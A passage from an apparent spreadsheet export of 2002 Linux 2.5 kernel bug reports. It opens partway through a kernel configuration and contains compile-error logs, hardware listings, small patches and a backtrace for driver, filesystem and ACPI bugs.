CONFIG_MDA_CONSOLE is not set # # Frame-buffer support # CONFIG_FB=y CONFIG_DUMMY_CONSOLE=y # CONFIG_FB_CLGEN is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_VIRTUAL is not set CONFIG_FBCON_ADVANCED=y # CONFIG_FBCON_MFB is not set # CONFIG_FBCON_CFB2 is not set # CONFIG_FBCON_CFB4 is not set CONFIG_FBCON_CFB8=y CONFIG_FBCON_CFB16=m CONFIG_FBCON_CFB24=m CONFIG_FBCON_CFB32=m # CONFIG_FBCON_ACCEL is not set # CONFIG_FBCON_AFB is not set # CONFIG_FBCON_ILBM is not set # CONFIG_FBCON_IPLAN2P2 is not set # CONFIG_FBCON_IPLAN2P4 is not set # CONFIG_FBCON_IPLAN2P8 is not set # CONFIG_FBCON_VGA_PLANES is not set # CONFIG_FBCON_HGA is not set # CONFIG_FBCON_FONTWIDTH8_ONLY is not set # CONFIG_FONT_SUN8x16 is not set # CONFIG_FONT_SUN12x22 is not set CONFIG_FBCON_FONTS=y CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # CONFIG_FONT_6x11 is not set # CONFIG_FONT_PEARL_8x8 is not set # CONFIG_FONT_ACORN_8x8 is not set # CONFIG_FONT_MINI_4x6 is not set # # Sound # CONFIG_SOUND=m # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # Advanced Linux Sound Architecture # CONFIG_SND=m # CONFIG_SND_SEQUENCER is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set CONFIG_SND_EMU10K1=m # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m CONFIG_USB_OHCI_HCD=m CONFIG_USB_UHCI_HCD=m # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # CONFIG_USB_STORAGE is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set CONFIG_USB_HIDDEV=y # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_CDCETHER is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_FRAME_POINTER is not set # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # # CONFIG_CRYPTO is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_X86_BIOS_REBOOT=y</t>
  </si>
  <si>
    <t>2.5.50 CONFIG_ACPI_SLEEP  fails to build without</t>
  </si>
  <si>
    <t>PCMCIA</t>
  </si>
  <si>
    <t>2002-12-02 01:33 UTC</t>
  </si>
  <si>
    <t>2003-01-10 16:37 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.50 Distribution: RedHat 8.0 Hardware Environment: Dell Latitude C840 laptop Software Environment: Problem Description: Failure to compile with CONFIG_ACPI_SPEEP defined Steps to reproduce: CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y # CONFIG_SOFTWARE_SUSPEND is not set In arch/i386/kernel/Makefile we have: obj-$(CONFIG_ACPI_SLEEP) += acpi_wakeup.o obj-$(CONFIG_SOFTWARE_SUSPEND) += suspend.o suspend_asm.o The variables used in acpi_wakeup.o:do_lowlevel_suspend() are defined in suspend.c, so you get: rch/i386/kernel/built-in.o: In function `do_suspend_lowlevel': arch/i386/kernel/built-in.o(.data+0x1764): undefined reference to `save_processor_state' arch/i386/kernel/built-in.o(.data+0x176a): undefined reference to `saved_context_esp' arch/i386/kernel/built-in.o(.data+0x176f): undefined reference to `saved_context_eax' (and a bunch more). Untested patch: --- drivers/acpi/Kconfig.dist 2002-12-02 04:30:53.000000000 -0500 +++ drivers/acpi/Kconfig 2002-12-02 04:31:41.000000000 -0500 @@ -58,8 +58,7 @@ config ACPI_SLEEP bool "Sleep States" - depends on X86 &amp;&amp; ACPI &amp;&amp; !ACPI_HT_ONLY - default SOFTWARE_SUSPEND + depends on X86 &amp;&amp; ACPI &amp;&amp; !ACPI_HT_ONLY &amp;&amp; SOFTWARE_SUSPEND ---help--- This option adds support for ACPI suspend states.</t>
  </si>
  <si>
    <t>problems mounting root partition with 2.5.48+ kernels</t>
  </si>
  <si>
    <t>ReiserFS</t>
  </si>
  <si>
    <t>2002-12-02 11:31 UTC</t>
  </si>
  <si>
    <t>2003-06-12 06:32 UTC</t>
  </si>
  <si>
    <t>Oleg Drokin</t>
  </si>
  <si>
    <t>Exact Kernel version:2.5.50 Distribution:Gentoo 1.4 Hardware Environment: Software Environment:GCC 3.2.1 Problem Description:I'm had the same problem happen with both XFS and ReiserFS as my root filesystem. Kernels &lt;= 2.5.47 can boot and mount the root partition without any problems. Kernels &gt; 2.5.47 boot (my /boot is another partition), but give the "cannot open root device" error when attempting to mount the root partition. My grub configuration hasn't changed and worked fine up until 2.5.48. Steps to reproduce: See above. I've attached my kernel config.</t>
  </si>
  <si>
    <t>2.5.50 breaks pcmcia cards</t>
  </si>
  <si>
    <t>2002-12-02 23:08 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:37 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.50 Distribution: RedHat 8.0 Hardware Environment: Dell Latitude C840 Software Environment: Problem Description: kernel fails to recognize pcmcia cards, gives error: PCI: Device 03:00.0 not available because of resource collisions PCI: Device 03:00.1 not available because of resource collisions The problem is a code migration in the 2.5.50 patch. I've appended a works-for-me patch. Steps to reproduce: Before patch: lspci reports: 00:00.0 Host bridge: Intel Corp. 82845 845 (Brookdale) Chipset Host Bridge (rev 04) 00:01.0 PCI bridge: Intel Corp. 82845 845 (Brookdale) Chipset AGP Bridge (rev 04 ) 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 42) 00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 02) 00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 02) 00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio (rev 02 ) 00:1f.6 Modem: Intel Corp. 82801CA/CAM AC'97 Modem (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 440 Go] (re v a3) 02:00.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 78) 02:01.0 CardBus bridge: Texas Instruments PCI4451 PC card Cardbus Controller 02:01.1 CardBus bridge: Texas Instruments PCI4451 PC card Cardbus Controller 02:01.2 FireWire (IEEE 1394): Texas Instruments PCI4451 IEEE-1394 Controller 02:03.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (re v 01) and it can't find my wireless card either. After the patch: 00:00.0 Host bridge: Intel Corp. 82845 845 (Brookdale) Chipset Host Bridge (rev 04) 00:01.0 PCI bridge: Intel Corp. 82845 845 (Brookdale) Chipset AGP Bridge (rev 04) 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 42) 00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 02) 00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 02) 00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio (rev 02) 00:1f.6 Modem: Intel Corp. 82801CA/CAM AC'97 Modem (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 440 Go] (rev a3) 02:00.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 78) 02:01.0 CardBus bridge: Texas Instruments PCI4451 PC card Cardbus Controller 02:01.1 CardBus bridge: Texas Instruments PCI4451 PC card Cardbus Controller 02:01.2 FireWire (IEEE 1394): Texas Instruments PCI4451 IEEE-1394 Controller 02:03.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 01) 03:00.0 Ethernet controller: Xircom Cardbus Ethernet 10/100 (rev 03) 03:00.1 Serial controller: Xircom Cardbus Ethernet + 56k Modem (rev 03) (the Xircom card it errored on)</t>
  </si>
  <si>
    <t>FSID returned from statvfs always 0</t>
  </si>
  <si>
    <t>ext2</t>
  </si>
  <si>
    <t>2002-12-03 14:55 UTC</t>
  </si>
  <si>
    <t>Colin DuPlantis</t>
  </si>
  <si>
    <t>2006-12-10 06:47 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.50 Distribution: Hardware Environment: i386(i686 to be exact) Software Environment: 2.5.50 running on top of mandrake 8.2 distro Problem Description: statvfs on any device always returns fsid of 0 Steps to reproduce: Run the following test program, passing it "/home" or whatever: #include &lt;stdio.h&gt; #include &lt;sys/statvfs.h&gt; int main(int argv, const char* argc[]) { const char *path1 = argc[1]; struct statvfs buf1; if(statvfs(path1, &amp;buf1) &lt; 0) { return 1; } printf("FSID of %s is %d\n", path1, buf1.f_fsid); return 0; } I marked this bug for ext2, but the same problem exists in ext3 as well. I was able to get it to work by adding the following line to super.c:975 in ext2: memcpy(&amp;buf-&gt;f_fsid, &amp;sb-&gt;u.ext2_sb.s_es-&gt;s_uuid, sizeof(buf-&gt;f_fsid)); for ext3, I added at 1892 in super.c: memcpy(&amp;buf-&gt;f_fsid, es-&gt;s_uuid, sizeof(buf-&gt;f_fsid)); I was not able to test this in a big-endian or a 64-bit environment. I tested it only on an i386 32-bit chip. I apologize if this bug is redundant or otherwise inappropriate. I searched the archives and the bug queue, but could find no relevant discussion of this problem. Thanks!</t>
  </si>
  <si>
    <t>Torrey Hoffman</t>
  </si>
  <si>
    <t>2003-02-21 04:39 UTC</t>
  </si>
  <si>
    <t>Build error: drivers/video/sis/sis_main.h:299: parse error before "sisfbinfo</t>
  </si>
  <si>
    <t>2002-12-04 17:11 UTC</t>
  </si>
  <si>
    <t>2003-06-11 09:24 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.50 Distribution: Red Hat 8.0 Hardware Environment: Pentium III, SIS chipset Software Environment: Up to date Red Hat 8.0 Problem Description: bzImage build failure: gcc -Wp,-MD,drivers/video/sis/.sis_main.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=pentium3 -Iarch/i386/mach-generic -nostdinc -iwithprefix include -DKBUILD_BASENAME=sis_main -DKBUILD_MODNAME=sisfb -DEXPORT_SYMTAB -c -o drivers/video/sis/sis_main.o drivers/video/sis/sis_main.c In file included from drivers/video/sis/sis_main.c:57: drivers/video/sis/sis_main.h:299: parse error before "sisfbinfo" drivers/video/sis/sis_main.h:299: warning: type defaults to int' in declaration of sisfbinfo' drivers/video/sis/sis_main.h:299: warning: data definition has no type or storage class drivers/video/sis/sis_main.c: In function sisfb_query_north_bridge_space': drivers/video/sis/sis_main.c:206: SIS_650' undeclared (first use in this function) (this continues with several dozen "foo is undefined" and similar errors in sis_main.c) Steps to reproduce: Relevant bits of my config: grep SIS .config CONFIG_BLK_DEV_SIS5513=y CONFIG_SIS900=m CONFIG_AGP_SIS=y CONFIG_FB_SIS=y CONFIG_FB_SIS_300=y CONFIG_FB_SIS_315=y</t>
  </si>
  <si>
    <t>error return not checked in register_disk (fs/partitions/check.c)</t>
  </si>
  <si>
    <t>2002-12-06 11:15 UTC</t>
  </si>
  <si>
    <t>Jon Smirl</t>
  </si>
  <si>
    <t>2003-01-10 16:50 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.49 Distribution: Linus - with UML 2.5.49 patch Hardware Environment: Software Environment: Problem Description: kernel panic About 10 lines into register_disk (fs/partitions/check.c) there is a call to kobject_register. kobject_register can return error codes. If there is an error then the disk structure may have been freed by kobject_cleanup. Register_disk needs to check for errors and not continue using the disk structure which has been freed. Steps to reproduce: The problem is easily visible with UML but the bug is in generic kernel code. I am trying to run UML with an extra ubd disk device: ./linux ubd0=cow,root_fs mode=tt root=/dev/ubd/0 ubd4=reiser4 debug=parent gdb-pid=1198 Adding ubd4=reiser4 causes a panic at boot. The problem is in register_disk for the second device. Register disk is calling kboject_register(&amp;disk-&gt;kobj). Registering calls kobject_add with returns error -17 (already exists from create_dir since ubd has already been created from the first device). This results in kobject_cleanup being called which ultimately causes the disk structure to be freed. This is bad news since no one is checking the error return from kobject_register in register disk. The code continues to use the disk structure which has just been freed and quickly results in a panic. #0 kobject_register (kobj=0xa1f84c2c) at lib/kobject.c:110 #1 0xa00976ba in register_disk (disk=0xa1f84bd4) at fs/partitions/check.c:409 #2 0xa001ef82 in ubd_new_disk (major=98, size=105906176, name=0xa01d61b6 "ubd", unit=256, disk_out=0x0, dir_handle=0xa1f52e94, handle_out=0xa1f84c2c) at arch/um/drivers/ubd_kern.c:510 #3 0xa001f026 in ubd_add (n=4) at arch/um/drivers/ubd_kern.c:536 #4 0xa001f4ca in ubd_init () at arch/um/drivers/ubd_kern.c:701 #5 0xa01a2f3e in do_initcalls () at init/main.c:467 (gdb)</t>
  </si>
  <si>
    <t>Laptop with touchpad and "pointer". Pointer never works</t>
  </si>
  <si>
    <t>2002-12-08 03:17 UTC</t>
  </si>
  <si>
    <t>Paolo Ciarrocchi</t>
  </si>
  <si>
    <t>2004-02-01 05:46 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version:2.5.50 (same problem with all the version I tried) Distribution: Mandrake Hardware Environment: HP Omnibook 6000 Software Environment: Problem Description: I can not get my pointer working with all the 2.5.*. As far as I know the problem is related to the fact that the two pointer share the same aux port. Steps to reproduce: Just boot ;-)</t>
  </si>
  <si>
    <t>Shawn Starr</t>
  </si>
  <si>
    <t>Adam Belay</t>
  </si>
  <si>
    <t>James Bottomley</t>
  </si>
  <si>
    <t>compile failure on drivers/char/riscom8.c</t>
  </si>
  <si>
    <t>Serial</t>
  </si>
  <si>
    <t>2002-12-10 05:49 UTC</t>
  </si>
  <si>
    <t>2003-08-21 18:57 UTC</t>
  </si>
  <si>
    <t>Michael Kory Woods</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit-KG7-RAID, 512MB, Geforce3 Software Environment: gcc 3.2 (3.2-r4) Problem Description: gcc -Wp,-MD,drivers/char/.riscom8.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -f no-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nostdi nc -iwithprefix include -DKBUILD_BASENAME=riscom8 -DKBUILD_MODNAME=riscom8 -c -o drivers/char/riscom8.o d rivers/char/riscom8.c In file included from drivers/char/riscom8.c:51: drivers/char/riscom8.h:88: field `tqueue' has incomplete type drivers/char/riscom8.h:89: field `tqueue_hangup' has incomplete type drivers/char/riscom8.c:84: warning: type defaults to `int' in declaration of `DECLARE_TASK_QUEUE' drivers/char/riscom8.c:84: warning: parameter names (without types) in function declaration drivers/char/riscom8.c: In function `rc_init_CD180': drivers/char/riscom8.c:247: warning: implicit declaration of function `save_flags' drivers/char/riscom8.c:247: warning: implicit declaration of function `cli' drivers/char/riscom8.c:251: warning: implicit declaration of function `sti' drivers/char/riscom8.c:264: warning: implicit declaration of function `restore_flags' drivers/char/riscom8.c: In function `rc_mark_event': drivers/char/riscom8.c:351: warning: implicit declaration of function `queue_task' drivers/char/riscom8.c:351: `tq_riscom' undeclared (first use in this function) drivers/char/riscom8.c:351: (Each undeclared identifier is reported only once drivers/char/riscom8.c:351: for each function it appears in.) drivers/char/riscom8.c:352: warning: implicit declaration of function `mark_bh' drivers/char/riscom8.c:352: `RISCOM8_BH' undeclared (first use in this function) drivers/char/riscom8.c: In function `rc_receive_exc': drivers/char/riscom8.c:435: structure has no member named `tqueue' drivers/char/riscom8.c:435: `tq_timer' undeclared (first use in this function) drivers/char/riscom8.c: In function `rc_receive': drivers/char/riscom8.c:466: structure has no member named `tqueue' drivers/char/riscom8.c:466: `tq_timer' undeclared (first use in this function) drivers/char/riscom8.c: In function `rc_check_modem': drivers/char/riscom8.c:556: warning: implicit declaration of function `schedule_task' drivers/char/riscom8.c: In function `do_riscom_bh': drivers/char/riscom8.c:1725: warning: implicit declaration of function `run_task_queue' drivers/char/riscom8.c:1725: `tq_riscom' undeclared (first use in this function) drivers/char/riscom8.c: In function `rc_init_drivers': drivers/char/riscom8.c:1754: warning: implicit declaration of function `init_bh' drivers/char/riscom8.c:1754: `RISCOM8_BH' undeclared (first use in this function) drivers/char/riscom8.c: In function `rc_release_drivers': drivers/char/riscom8.c:1833: warning: implicit declaration of function `remove_bh' drivers/char/riscom8.c:1833: `RISCOM8_BH' undeclared (first use in this function) drivers/char/riscom8.c: At top level: drivers/char/riscom8.c:84: warning: `DECLARE_TASK_QUEUE' declared `static' but never defined make[2]: *** [drivers/char/riscom8.o] Error 1 make[1]: *** [drivers/char] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Character devices / SDL RISCom/8 card support CONFIG_RISCOM8=y</t>
  </si>
  <si>
    <t>compile failure on drivers/char/esp.c</t>
  </si>
  <si>
    <t>2002-12-10 07:42 UTC</t>
  </si>
  <si>
    <t>2003-08-21 19:02 UTC</t>
  </si>
  <si>
    <t>Russell King</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, 512MB, Geforce3 Software Environment: gcc 3.2 (3.2-r4) Problem Description: gcc -Wp,-MD,drivers/char/.esp.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-s trict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nostdinc - iwithprefix include -DKBUILD_BASENAME=esp -DKBUILD_MODNAME=esp -c -o drivers/char/esp.o drivers/char/esp. c drivers/char/esp.c:110: warning: type defaults to `int' in declaration of `DECLARE_TASK_QUEUE' drivers/char/esp.c:110: warning: parameter names (without types) in function declaration drivers/char/esp.c: In function `rs_stop': drivers/char/esp.c:225: warning: implicit declaration of function `save_flags' drivers/char/esp.c:225: warning: implicit declaration of function `cli' drivers/char/esp.c:232: warning: implicit declaration of function `restore_flags' drivers/char/esp.c:220: warning: `flags' might be used uninitialized in this function drivers/char/esp.c: In function `rs_start': drivers/char/esp.c:238: warning: `flags' might be used uninitialized in this function drivers/char/esp.c: In function `rs_sched_event': drivers/char/esp.c:281: warning: implicit declaration of function `queue_task' drivers/char/esp.c:281: `tq_esp' undeclared (first use in this function) drivers/char/esp.c:281: (Each undeclared identifier is reported only once drivers/char/esp.c:281: for each function it appears in.) drivers/char/esp.c:282: warning: implicit declaration of function `mark_bh' drivers/char/esp.c:282: `ESP_BH' undeclared (first use in this function) drivers/char/esp.c: In function `receive_chars_pio': drivers/char/esp.c:324: warning: implicit declaration of function `sti' drivers/char/esp.c:377: structure has no member named `tqueue' drivers/char/esp.c:377: `tq_timer' undeclared (first use in this function) drivers/char/esp.c: In function `receive_chars_dma_done': drivers/char/esp.c:452: structure has no member named `tqueue' drivers/char/esp.c:452: `tq_timer' undeclared (first use in this function) drivers/char/esp.c: In function `check_modem_status': drivers/char/esp.c:647: warning: implicit declaration of function `schedule_task' drivers/char/esp.c: In function `do_serial_bh': drivers/char/esp.c:775: warning: implicit declaration of function `run_task_queue' drivers/char/esp.c:775: `tq_esp' undeclared (first use in this function) drivers/char/esp.c: In function `espserial_init': drivers/char/esp.c:2514: warning: implicit declaration of function `init_bh' drivers/char/esp.c:2514: `ESP_BH' undeclared (first use in this function) drivers/char/esp.c:2644: structure has no member named `routine' drivers/char/esp.c:2646: structure has no member named `routine' drivers/char/esp.c: In function `espserial_exit': drivers/char/esp.c:2718: warning: implicit declaration of function `remove_bh' drivers/char/esp.c:2718: `ESP_BH' undeclared (first use in this function) drivers/char/esp.c: At top level: drivers/char/esp.c:110: warning: `DECLARE_TASK_QUEUE' declared `static' but never defined make[2]: *** [drivers/char/esp.o] Error 1 make[1]: *** [drivers/char] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Character devices / Hayes ESP serial port support CONFIG_ESPSERIAL=y</t>
  </si>
  <si>
    <t>compile failure on drivers/char/specialix.c</t>
  </si>
  <si>
    <t>2002-12-10 08:15 UTC</t>
  </si>
  <si>
    <t>2003-08-21 19:00 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, 512MB, Geforce3 Software Environment: gcc 3.2 (3.2-r4) Problem Description: gcc -Wp,-MD,drivers/char/.specialix.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nost dinc -iwithprefix include -DKBUILD_BASENAME=specialix -DKBUILD_MODNAME=specialix -c -o drivers/char/speci alix.o drivers/char/specialix.c In file included from drivers/char/specialix.c:130: drivers/char/specialix_io8.h:127: field `tqueue' has incomplete type drivers/char/specialix_io8.h:128: field `tqueue_hangup' has incomplete type drivers/char/specialix.c:174: warning: type defaults to `int' in declaration of `DECLARE_TASK_QUEUE' drivers/char/specialix.c:174: warning: parameter names (without types) in function declaration drivers/char/specialix.c:174: warning: data definition has no type or storage class drivers/char/specialix.c: In function `sx_init_CD186x': drivers/char/specialix.c:395: warning: implicit declaration of function `save_flags' drivers/char/specialix.c:395: warning: implicit declaration of function `cli' drivers/char/specialix.c:399: warning: implicit declaration of function `sti' drivers/char/specialix.c:422: warning: implicit declaration of function `restore_flags' drivers/char/specialix.c: In function `sx_mark_event': drivers/char/specialix.c:613: warning: implicit declaration of function `queue_task' drivers/char/specialix.c:613: `tq_specialix' undeclared (first use in this function) drivers/char/specialix.c:613: (Each undeclared identifier is reported only once drivers/char/specialix.c:613: for each function it appears in.) drivers/char/specialix.c:614: warning: implicit declaration of function `mark_bh' drivers/char/specialix.c:614: `SPECIALIX_BH' undeclared (first use in this function) drivers/char/specialix.c: In function `sx_receive_exc': drivers/char/specialix.c:699: structure has no member named `tqueue' drivers/char/specialix.c:699: `tq_timer' undeclared (first use in this function) drivers/char/specialix.c: In function `sx_receive': drivers/char/specialix.c:730: structure has no member named `tqueue' drivers/char/specialix.c:730: `tq_timer' undeclared (first use in this function) drivers/char/specialix.c: In function `sx_check_modem': drivers/char/specialix.c:837: warning: implicit declaration of function `schedule_task' drivers/char/specialix.c: In function `do_specialix_bh': drivers/char/specialix.c:2201: warning: implicit declaration of function `run_task_queue' drivers/char/specialix.c:2201: `tq_specialix' undeclared (first use in this function) drivers/char/specialix.c: In function `sx_init_drivers': drivers/char/specialix.c:2232: warning: implicit declaration of function `init_bh' drivers/char/specialix.c:2232: `SPECIALIX_BH' undeclared (first use in this function) make[2]: *** [drivers/char/specialix.o] Error 1 make[1]: *** [drivers/char] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Character devices / Specialix IO8+ card support CONFIG_SPECIALIX=y</t>
  </si>
  <si>
    <t>compile failure on drivers/ide/pci/nvidia.c</t>
  </si>
  <si>
    <t>2002-12-10 08:32 UTC</t>
  </si>
  <si>
    <t>2003-01-11 06:19 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, 512MB, Geforce3 Software Environment: gcc 3.2 (3.2-r4) Problem Description: gcc -Wp,-MD,drivers/ide/pci/.nvidia.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nost dinc -iwithprefix include -Idrivers/ide -DKBUILD_BASENAME=nvidia -DKBUILD_MODNAME=nvidia -c -o drivers/ide /pci/nvidia.o drivers/ide/pci/nvidia.c In file included from drivers/ide/pci/nvidia.c:29: drivers/ide/pci/nvidia.h:35: `PCI_DEVICE_ID_NVIDIA_NFORCE_IDE' undeclared here (not in a function) drivers/ide/pci/nvidia.h:35: initializer element is not constant drivers/ide/pci/nvidia.h:35: (near initialization for `nvidia_chipsets[0].device') drivers/ide/pci/nvidia.h:43: initializer element is not constant drivers/ide/pci/nvidia.h:43: (near initialization for `nvidia_chipsets[0].enablebits[0]') drivers/ide/pci/nvidia.h:43: initializer element is not constant drivers/ide/pci/nvidia.h:43: (near initialization for `nvidia_chipsets[0].enablebits[1]') drivers/ide/pci/nvidia.h:43: initializer element is not constant drivers/ide/pci/nvidia.h:43: (near initialization for `nvidia_chipsets[0].enablebits') drivers/ide/pci/nvidia.h:46: initializer element is not constant drivers/ide/pci/nvidia.h:46: (near initialization for `nvidia_chipsets[0]') drivers/ide/pci/nvidia.c: In function `nforce_ratemask': drivers/ide/pci/nvidia.c:79: `PCI_DEVICE_ID_NVIDIA_NFORCE_IDE' undeclared (first use in this function) drivers/ide/pci/nvidia.c:79: (Each undeclared identifier is reported only once drivers/ide/pci/nvidia.c:79: for each function it appears in.) drivers/ide/pci/nvidia.c: In function `ata66_nforce': drivers/ide/pci/nvidia.c:288: `PCI_DEVICE_ID_NVIDIA_NFORCE_IDE' undeclared (first use in this function) drivers/ide/pci/nvidia.c: At top level: drivers/ide/pci/nvidia.c:343: `PCI_DEVICE_ID_NVIDIA_NFORCE_IDE' undeclared here (not in a function) drivers/ide/pci/nvidia.c:343: initializer element is not constant drivers/ide/pci/nvidia.c:343: (near initialization for `nforce_pci_tbl[0].device') drivers/ide/pci/nvidia.c:343: initializer element is not constant drivers/ide/pci/nvidia.c:343: (near initialization for `nforce_pci_tbl[0]') drivers/ide/pci/nvidia.c:344: initializer element is not constant drivers/ide/pci/nvidia.c:344: (near initialization for `nforce_pci_tbl[1]') make[3]: *** [drivers/ide/pci/nvidia.o] Error 1 make[2]: *** [drivers/ide/pci] Error 2 make[1]: *** [drivers/ide] Error 2 make: *** [drivers] Error 2 Steps to reproduce: IDE, ATA and ATAPI Block devices / nVidia NFORCE support CONFIG_BLK_DEV_NFORCE=y</t>
  </si>
  <si>
    <t>Makefile bug? sound/synth/emux/built-in.o</t>
  </si>
  <si>
    <t>Sound(ALSA)</t>
  </si>
  <si>
    <t>2002-12-10 12:22 UTC</t>
  </si>
  <si>
